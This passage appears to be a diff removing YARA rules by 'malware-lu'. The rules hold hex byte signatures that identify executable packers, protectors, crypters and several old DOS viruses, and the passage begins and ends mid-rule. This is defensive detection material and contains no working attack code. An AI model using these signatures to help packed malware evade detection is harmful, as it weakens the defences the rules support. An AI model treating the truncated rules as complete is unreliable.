-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FF 60 FF CA FF 00 BA DC 0D E0 40 00 50 00 60 00 70 00 80 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PolyBoxCAnskya
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 F0 53 56 B8 E4 41 00 10 E8 3A E1 FF FF 33 C0 55 68 11 44 00 10 64 FF 30 64 89 20 EB 08 FC FC FC FC FC FC 27 54 6A 0A 68 20 44 00 10 A1 1C 71 00 10 50 E8 CC E1 ?? ?? ?? ?? 85 DB 0F 84 77 01 00 00 53 A1 1C 71 00 10 50 E8 1E E2 FF FF 8B F0 85 F6 0F 84 61 01 00 00 53 A1 1C 71 00 10 50 E8 E0 E1 FF FF 85 C0 0F 84 4D 01 00 00 50 E8 DA E1 FF FF 8B D8 85 DB 0F 84 3D 01 00 00 56 B8 70 80 00 10 B9 01 00 00 00 8B 15 98 41 00 10 E8 9E DE FF FF 83 C4 04 A1 70 80 00 10 8B CE 8B D3 E8 E1 E1 FF FF 6A 00 6A 00 A1 70 80 00 10 B9 30 44 00 10 8B D6 E8 F8 FD FF FF }
-
-condition:
-		$a0
-}
-	
-	
-rule UPolyXv05
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC ?? 00 BD 46 00 8B ?? B9 ?? 00 00 00 80 ?? ?? 51 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-	$a1 = { 83 EC 04 89 14 24 59 BA ?? 00 00 00 52 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 }
-	$a2 = { BB 00 BD 46 00 83 EC 04 89 1C 24 ?? B9 ?? 00 00 00 80 33 ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-	$a3 = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 ?? 00 BD 46 00 83 EC 04 89 ?? 24 B9 ?? 00 00 00 81 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-	$a4 = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 ?? 00 BD 46 00 ?? B9 ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-	$a5 = { EB 01 C3 ?? 00 BD 46 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-
-condition:
-		$a0 or $a1 or $a2 or $a3 or $a4 or $a5
-}
-	
-	
-rule beriav007publicWIPsymbiont
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 18 53 8B 1D 00 30 ?? ?? 55 56 57 68 30 07 00 00 33 ED 55 FF D3 8B F0 3B F5 74 0D 89 AE 20 07 00 00 E8 88 0F 00 00 EB 02 33 F6 6A 10 55 89 35 30 40 ?? ?? FF D3 8B F0 3B F5 74 09 89 2E E8 3C FE FF FF EB 02 33 F6 6A 18 55 89 35 D8 43 ?? ?? FF D3 8B F0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PCGuardv405dv410dv415d
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FC 55 50 E8 00 00 00 00 5D EB 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule asscrypterbysantasdad
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 EC 53 ?? ?? ?? ?? 89 45 EC B8 98 40 00 10 E8 AC EA FF FF 33 C0 55 68 78 51 00 10 64 ?? ?? ?? ?? 20 6A 0A 68 88 51 00 10 A1 E0 97 00 10 50 E8 D8 EA FF FF 8B D8 53 A1 E0 97 00 10 50 E8 12 EB FF FF 8B F8 53 A1 E0 97 00 10 50 E8 DC EA FF FF 8B D8 53 E8 DC EA FF FF 8B F0 85 F6 74 26 8B D7 4A B8 F0 97 00 10 E8 C9 E7 FF FF B8 F0 97 00 10 E8 B7 E7 FF FF 8B CF 8B D6 E8 EE EA FF FF 53 E8 98 EA FF FF 8D 4D EC BA 9C 51 00 10 A1 F0 97 00 10 E8 22 EB FF FF 8B 55 EC B8 F0 97 00 10 E8 89 E6 FF FF B8 F0 97 00 10 E8 7F E7 FF FF E8 6E EC FF FF 33 C0 5A 59 59 64 89 10 68 7F 51 00 10 8D 45 EC E8 11 E6 FF FF C3 E9 FF DF FF FF EB F0 5F 5E 5B E8 0D E5 FF FF 00 53 45 54 54 49 4E 47 53 00 00 00 00 FF FF FF FF 1C 00 00 00 45 4E 54 45 52 20 59 4F 55 52 20 4F 57 4E 20 50 41 53 53 57 4F 52 44 20 48 45 52 45 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CopyControlv303
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { CC 90 90 EB 0B 01 50 51 52 53 54 61 33 61 2D 35 CA D1 07 52 D1 A1 3C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv110Engbartxt
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Elanguage
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 06 00 00 00 50 E8 ?? 01 00 00 55 8B EC 81 C4 F0 FE FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXELOCK66615
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BA ?? ?? BF ?? ?? EB ?? EA ?? ?? ?? ?? 79 ?? 7F ?? 7E ?? 1C ?? 48 78 ?? E3 ?? 45 14 ?? 5A E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AdysGluev010
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 2E 8C 06 ?? ?? 0E 07 33 C0 8E D8 BE ?? ?? BF ?? ?? FC B9 ?? ?? 56 F3 A5 1E 07 5F }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SVKProtectorv132
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 06 36 42 00 64 A0 23 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PKLITEv114v115v1203
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? BA ?? ?? 05 ?? ?? 3B ?? ?? ?? 72 ?? B4 09 BA ?? 01 CD 21 CD 20 4E 6F }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SafeGuardV10Xsimonzh2000
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 EB 29 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 59 9C 81 C1 E2 FF FF FF EB 01 ?? 9D FF E1 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEiDBundlev102v103DLLBoBBobSoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 00 08 00 39 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FreeJoinerSmallbuild023GlOFF
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 E1 FD FF FF 6A 00 E8 0C 00 00 00 FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PrivatePersonalPackerPPP102ConquestOfTroycom
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 17 00 00 00 E8 68 00 00 00 FF 35 2C 37 00 10 E8 ED 01 00 00 6A 00 E8 2E 04 00 00 E8 41 04 00 00 A3 74 37 00 10 6A 64 E8 5F 04 00 00 E8 30 04 00 00 A3 78 37 00 10 6A 64 E8 4E 04 00 00 E8 1F 04 00 00 A3 7C 37 00 10 A1 74 37 00 10 8B 1D 78 37 00 10 2B D8 8B 0D 7C 37 00 10 2B C8 83 FB 64 73 0F 81 F9 C8 00 00 00 73 07 6A 00 E8 D9 03 00 00 C3 6A 0A 6A 07 6A 00 E8 D3 03 00 00 A3 20 37 00 10 50 6A 00 E8 DE 03 00 00 A3 24 37 00 10 FF 35 20 37 00 10 6A 00 E8 EA 03 00 00 A3 30 37 00 10 FF 35 24 37 00 10 E8 C2 03 00 00 A3 28 37 00 10 8B 0D 30 37 00 10 8B 3D 28 37 00 10 EB 09 49 C0 04 39 55 80 34 39 24 0B C9 }
-
-condition:
-		$a0
-}
-	
-	
-rule DIETv102bv110av120
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE ?? ?? BF ?? ?? B9 ?? ?? 3B FC 72 ?? B4 4C CD 21 FD F3 A5 FC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPXECLiPSElayer
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 D2 EB 01 0F 56 EB 01 0F E8 03 00 00 00 EB 01 0F EB 01 0F 5E EB 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Obsidium1334ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33 }
-	$a1 = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 03 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule PKLITEv150Devicedrivercompression
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B4 09 BA 14 01 CD 21 B8 00 4C CD 21 F8 9C 50 53 51 52 56 57 55 1E 06 BB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxGrazie883
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 1E 0E 1F 50 06 BF 70 03 B4 1A BA 70 03 CD 21 B4 47 B2 00 BE 32 04 CD 21 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PROTECTEXECOMv60
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 1E B4 30 CD 21 3C 02 73 ?? CD 20 BE ?? ?? E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ENIGMAProtectorSukhovVladimir
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 45 6E 69 67 6D 61 20 70 72 6F 74 65 63 74 6F 72 20 76 31 }
-
-condition:
-		$a0
-}
-	
-	
-rule CRYPToCRACksPEProtectorV093LukasFleischer
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 5B 81 E3 00 FF FF FF 66 81 3B 4D 5A 75 33 8B F3 03 73 3C 81 3E 50 45 00 00 75 26 0F B7 46 18 8B C8 69 C0 AD 0B 00 00 F7 E0 2D AB 5D 41 4B 69 C9 DE C0 00 00 03 C1 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv147v150
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 5B 12 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PocketPCMIB
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 FF BD 27 14 00 BF AF 18 00 A4 AF 1C 00 A5 AF 20 00 A6 AF 24 00 A7 AF ?? ?? ?? 0C 00 00 00 00 18 00 A4 8F 1C 00 A5 8F 20 00 A6 8F ?? ?? ?? 0C 24 00 A7 8F ?? ?? ?? 0C 25 20 40 00 14 00 BF 8F 08 00 E0 03 18 00 BD 27 ?? FF BD 27 18 00 ?? AF ?? 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WWPACKv305c4ExtractableVirusShield
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 03 05 40 1A B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxNoon1163
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 5B 50 56 B4 CB CD 21 3C 07 ?? ?? 81 ?? ?? ?? 2E ?? ?? 4D 5A ?? ?? BF 00 01 89 DE FC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PuNkMoD1xPuNkDuDe
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 94 B9 ?? ?? 00 00 BC ?? ?? ?? ?? 80 34 0C }
-
-condition:
-		$a0
-}
-	
-	
-rule PECrypt32Consolev10v101v102
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 5B 83 EB 05 EB 04 52 4E 44 21 EB 02 CD 20 EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule InnoSetupModulev2018
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 B8 53 56 57 33 C0 89 45 F0 89 45 BC 89 45 B8 E8 73 71 FF FF E8 DA 85 FF FF E8 81 A7 FF FF E8 C8 }
-
-condition:
-		$a0
-}
-	
-	
-rule Nakedbind10nakedcrew
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 64 8B 38 48 8B C8 F2 AF AF 8B 1F 66 33 DB 66 81 3B 4D 5A 74 08 81 EB 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NsPacKV31LiuXingPing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? ?? ?? 8A 03 3C 00 74 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AntiVirusVaccinev103
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FA 33 DB B9 ?? ?? 0E 1F 33 F6 FC AD 35 ?? ?? 03 D8 E2 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxKuku448
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { AE 75 ED E2 F8 89 3E ?? ?? BA ?? ?? 0E 07 BF ?? ?? EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASProtectv12xNewStrain
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 01 ?? ?? ?? E8 01 ?? ?? ?? C3 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SimpleUPXCryptorv3042005OnelayerencryptionMANtiCORE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AntiDote10Demo12SISTeam
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 09 01 47 65 74 43 6F 6D 6D 61 6E 64 4C 69 6E 65 41 00 DB 01 47 65 74 56 65 72 73 69 6F 6E 45 78 41 00 73 01 47 65 74 4D 6F 64 75 6C 65 46 69 6C 65 4E 61 6D 65 41 00 00 7A 03 57 61 69 74 46 6F 72 53 69 6E 67 6C 65 4F 62 6A 65 63 74 00 BF 02 52 65 73 75 6D 65 54 68 72 65 61 64 00 00 29 03 53 65 74 54 68 72 65 61 64 43 6F 6E 74 65 78 74 00 00 94 03 57 72 69 74 65 50 72 6F 63 65 73 73 4D 65 6D 6F 72 79 00 00 6B 03 56 69 72 74 75 61 6C 41 6C 6C 6F 63 45 78 00 00 A6 02 52 65 61 64 50 72 6F 63 65 73 73 4D 65 6D 6F 72 79 00 CA 01 47 65 74 54 68 72 65 61 64 43 6F 6E 74 65 78 74 00 00 62 00 43 72 65 61 74 65 50 72 6F 63 65 73 73 41 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C }
-
-condition:
-		$a0
-}
-	
-	
-rule FSGv110EngbartxtWinRARSFX
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 80 E9 A1 C1 C1 13 68 E4 16 75 46 C1 C1 05 5E EB 01 9D 68 64 86 37 46 EB 02 8C E0 5F F7 D0 }
-	$a1 = { EB 01 02 EB 02 CD 20 B8 80 ?? 42 00 EB 01 55 BE F4 00 00 00 13 DF 13 D8 0F B6 38 D1 F3 F7 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule BJFntv11b
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 EA 9C EB 01 EA 53 EB 01 EA 51 EB 01 EA 52 EB 01 EA 56 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ThinstallEmbedded26202623Jitit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 58 BB AC 1E 00 00 2B C3 50 68 ?? ?? ?? ?? 68 B0 21 00 00 68 C4 00 00 00 E8 C3 FE FF FF E9 99 FF FF FF 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SLVc0deProtector11xSLVICU
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 58 C6 00 EB C6 40 01 08 FF E0 E9 4C ?? ?? 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RJoinerbyVaskaSignfrompinch250320071700
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 03 FD FF FF 6A 00 E8 0C 00 00 00 FF 25 6C 10 40 00 FF 25 70 10 40 00 FF 25 74 10 40 00 FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AverCryptor10os1r1s
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 75 17 40 00 8B BD 9C 18 40 00 8B 8D A4 18 40 00 B8 BC 18 40 00 03 C5 80 30 05 83 F9 00 74 71 81 7F 1C AB 00 00 00 75 62 8B 57 0C 03 95 A0 18 40 00 33 C0 51 33 C9 66 B9 FA 00 66 83 F9 00 74 49 8B 57 0C 03 95 A0 18 40 00 8B 85 A8 18 40 00 83 F8 02 75 06 81 C2 00 02 00 00 51 8B 4F 10 83 F8 02 75 06 81 E9 00 02 00 00 57 BF C8 00 00 00 8B F1 E8 27 00 00 00 8B C8 5F B8 BC 18 40 00 03 C5 E8 24 00 00 00 59 49 EB B1 59 83 C7 28 49 EB 8A 8B 85 98 18 40 00 89 44 24 1C 61 FF E0 56 57 4F F7 D7 23 F7 8B C6 5F 5E C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule nSpackV23LiuXingPing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 70 61 63 6B 24 40 }
-
-condition:
-		$a0
-}
-	
-	
-rule SENDebugProtector
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BB ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? 29 ?? ?? 4E E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule xPEP03xxIkUg
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 53 56 51 52 57 E8 16 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AntiDote14SESISTeam
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 90 03 00 00 E8 C6 FD FF FF 68 90 03 00 00 E8 BC FD FF FF 68 90 03 00 00 E8 B2 FD FF FF 50 E8 AC FD FF FF 50 E8 A6 FD FF FF 68 69 D6 00 00 E8 9C FD FF FF 50 E8 96 FD FF FF 50 E8 90 FD FF FF 83 C4 20 E8 78 FF FF FF 84 C0 74 4F 68 04 01 00 00 68 10 22 60 00 6A 00 FF 15 08 10 60 00 68 90 03 00 00 E8 68 FD FF FF 68 69 D6 00 00 E8 5E FD FF FF 50 E8 58 FD FF FF 50 E8 52 FD FF FF E8 DD FE FF FF 50 68 A4 10 60 00 68 94 10 60 00 68 10 22 60 00 E8 58 FD FF FF 83 C4 20 33 C0 C2 10 00 8B 4C 24 08 56 8B 74 24 08 33 D2 8B C6 F7 F1 8B C6 85 D2 74 08 33 D2 F7 F1 40 0F AF C1 5E C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NsPack30NorthStar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 00 74 15 8B F5 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ORiENV212FisunAV
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 5D 01 00 00 CE D1 CE CD 0D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NsPackv23NorthStar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD }
-	$a1 = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 56 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 54 03 00 00 03 D9 50 53 E8 9D 02 00 00 61 }
-
-condition:
-		$a0 or $a1
-}
-	
-	
-rule ObsidiumV1342ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 C3 27 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SplashBitmapv100WithUnpackCodeBoBBobsoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 60 8B 6C 24 20 55 81 ED ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 F9 31 C0 FC F3 AA 8B 04 24 48 66 25 00 F0 66 81 38 4D 5A 75 F4 8B 48 3C 81 3C 01 50 45 00 00 75 E8 89 85 ?? ?? ?? ?? 6A 40 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule KBySV028shoooo
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 ?? ?? ?? ?? E8 01 00 00 00 C3 C3 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ObsidiumV12XObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 0E 00 00 00 33 C0 8B 54 24 0C 83 82 B8 00 00 00 0D C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NsPackV13LiuXingPing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01PENinja131Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
